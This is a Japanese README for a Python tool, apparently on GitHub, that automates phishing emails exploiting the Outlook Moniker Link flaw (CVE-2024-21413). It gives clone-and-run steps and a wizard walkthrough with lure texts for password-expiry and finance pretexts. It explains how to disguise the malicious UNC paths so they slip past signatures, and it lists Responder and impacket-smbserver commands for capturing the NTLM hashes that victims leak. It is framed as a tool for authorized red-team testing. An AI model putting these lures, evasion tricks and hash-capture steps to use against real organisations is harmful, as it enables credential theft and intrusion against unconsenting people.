
CVE-2024-21413(Moniker Link)を利用した標的型フィッシングキャンペーンをシミュレートするためのセキュリティリサーチツール。
CVE-2024-21413 Moniker Link 脆弱性を利用した、標的型フィッシングキャンペーンをシミュレートするためのセキュリティ研究ツールです。許可を得たレッドチーム運用、ペネトレーションテスト、セキュリティ意識向上トレーニング向けに設計されています。
BLIND TRUST は、セキュリティチームが高度な電子メールベースの攻撃に対する防御を理解しテストするのに役立つフィッシングエンゲージメントフレームワークです。Moniker Link 技術を利用して Outlook の Protected View をバイパスし、組織がセキュリティ体制を強化するために使用できる現実的な攻撃シミュレーションを提供します。
このツールは、設定からメール配信までのキャンペーンワークフロー全体を自動化し、カスタマイズ可能な UNC パスと柔軟な pretext オプションによって運用上のセキュリティを維持します。
組織が効果的に防御するには、実際の攻撃手法を理解する必要があります。TRUST は以下を可能にします:
.txt ファイルからターゲットを読み込み# Clone the repository
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Run the tool
python3 TRUST_v7.py
このツールは Python 標準ライブラリのモジュールのみを使用します:
getpass - Secure password input
html - HTML escaping
ipaddress - IP address validation
logging - Structured logging
os - File operations
re - Regular expressions
signal - Signal handling
smtplib - SMTP email protocol
sys - System utilities
time - Time operations
dataclasses - Configuration modeling
email - MIME email construction
typing - Type hints
外部パッケージは不要です。Python 3.7+ があればどこでも実行できます。
python3 TRUST_v7.py
対話式ウィザードに従って 5 つのステップを実行します:
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]
Email subject [Security Update Required]: Urgent: Password Expiration Notice
Display name (From field) [Microsoft Security Center]: IT Security Team
Email body text: Your password expires in 24 hours. Please update immediately.
UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024
targets.txt を作成します:
# Finance Department
[email protected]
[email protected]
[email protected]
# Accounting
[email protected]
[email protected]
次に実行します:
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt
Email subject: Q3 Financial Review - Action Required
Display name: Finance Operations Team
Email body: Please review the attached Q3 financial statement and provide approval.
UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report
Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report
2 つのオプションがあります:
# で始まるコメントを記述した .txt ファイルから読み込みここで明らかなシグネチャを回避します:
finance-internal.company.com)を使用quarterly、updates、documents のような現実的な共有名q3_report、security_patch、training_document のような現実的なファイル名結果: 明白な \\192.168.1.100\share!exploit の代わりに、file://finance-internal.company.com/quarterly!q3_report のようなものが得られます。
Start
↓
[STEP 1] Prompt for attacker email and SMTP password
↓
[STEP 2] Prompt for SMB listener IP
↓
[STEP 3] Load target emails (file or input)
↓
↓→ For each target:
│ - Validate email format
│ - Check for duplicates
│
[STEP 4] Prompt for email pretext
│ - Subject, From name, body text
│
[STEP 5] Prompt for UNC path customization
│ - Host, share, exploit name
│
↓
[BUILD] Construct configuration object
↓
[VALIDATE] Check all fields are present and valid
↓
[SUMMARY] Display pre-send summary for review
↓
[CONFIRM] User approves or cancels
↓
[SEND] For each target:
│ - Build MIME email with custom Moniker Link
│ - Attempt SMTP delivery with retry logic
│ - Log per-target success/failure
│
↓
[REPORT] Display campaign results (delivered vs failed)
↓
Exit
CVE-2024-21413(Moniker Link)は、! 文字を含む file:// URL を埋め込むことを可能にする Outlook の脆弱性です。ユーザーがそのようなリンクをクリックすると、Outlook は UNC パスへのアクセスを試み、Protected View モードでも NTLM 認証試行を引き起こします。
\\host\share!exploit へのアクセスを試みる! 文字が Protected View をバイパスするTRUST は配信フェーズを自動化します:
解決策: SMTP 資格情報を確認してください。Gmail の場合はアプリ固有のパスワードを使用します。社内メールの場合は SMTP 管理者に確認してください。
解決策: 一部の SMTP サーバーでは正常です。接続は TLS 暗号化なしで続行されます。
解決策: ワードリストファイル内のメールアドレスが完全で有効な形式([email protected])であることを確認してください。
解決策: メールアドレスがターゲットサーバーに存在しないか、サーバーがアカウントからのリレーをブロックしています。
解決策: ファイルパスが正しいこと、およびファイルが現在のディレクトリに存在することを確認してください。
Q: このツールは合法的に使用できますか? A: テスト対象組織からの明示的な書面による承認がある場合のみです。無断でのフィッシングは違法です。常に作業範囲(スコープ)と実施規則(ルール・オブ・エンゲージメント)を書面で交わしてください。
Q: 高度なメールフィルターをバイパスできますか? A: 現実的なシミュレーションですが、最新のメールセキュリティが検出する可能性は依然としてあります。それがポイントです。もし自組織のフィルターがこれに対して失敗するなら、解決すべき問題があるということです。
Q: なぜ UNC パスをカスタマイズするのですか?
A: 元の \\IP\share!exploit は一目で分かってしまいます。実際の攻撃者は現実的なパスを使用します。セキュリティチームは明白な指標と微妙な指標の両方を検出できるべきです。
Q: 従業員のトレーニングに使用できますか? A: はい。許可を得たテストの後、匿名化したキャンペーン例をセキュリティ意識向上トレーニングで使用し、従業員に実際の攻撃手法を示してください。
Q: 資格情報を取得しますか? A: いいえ。TRUST はメールを配信するだけです。ターゲットがリンクをクリックしたときに NTLM ハッシュを取得するには、別の SMB リスナー(Responder、impacket-smbserver など)が必要です。
Q: SMB リスナーはどのようにセットアップしますか? A: Linux で Responder を使用するか、impacket-smbserver を使用します:
# Responder (captures hashes)
sudo responder -i eth0 -v
# impacket-smbserver (file server simulation)
impacket-smbserver Share /tmp -smb2support
このツールは許可を得たセキュリティテスト専用です。
TRUST を使用することで、法的な影響を理解し、適切な許可を得ていることを承認したことになります。
このプロジェクトは、利用制限を追加した MIT ライセンスの下で公開されています。詳細は LICENSE を参照してください。
このプロジェクトは、CMNatic (https://github.com/cmnatic) による元の CVE-2024-21413 の研究と実装に基づき、それに触発されたものです。
CMNatic は以下の点で完全な功績があります:
このリポジトリはその作業の修正・拡張版であり、以下の拡張が含まれています:
より詳細な帰属については CREDITS.md を参照してください。
H1SS - セキュリティ研究および許可を得たテストを目的として、このバージョンを拡張およびメンテナンスしています。
貢献は歓迎します。変更を行う際は以下の点を確認してください:
ガイドラインについては CONTRIBUTING.md を参照してください。
問題、質問、提案については、GitHub で issue を開いてください。
注意: このツールは研究プロジェクトです。責任を持って、合法的に、倫理的に使用してください。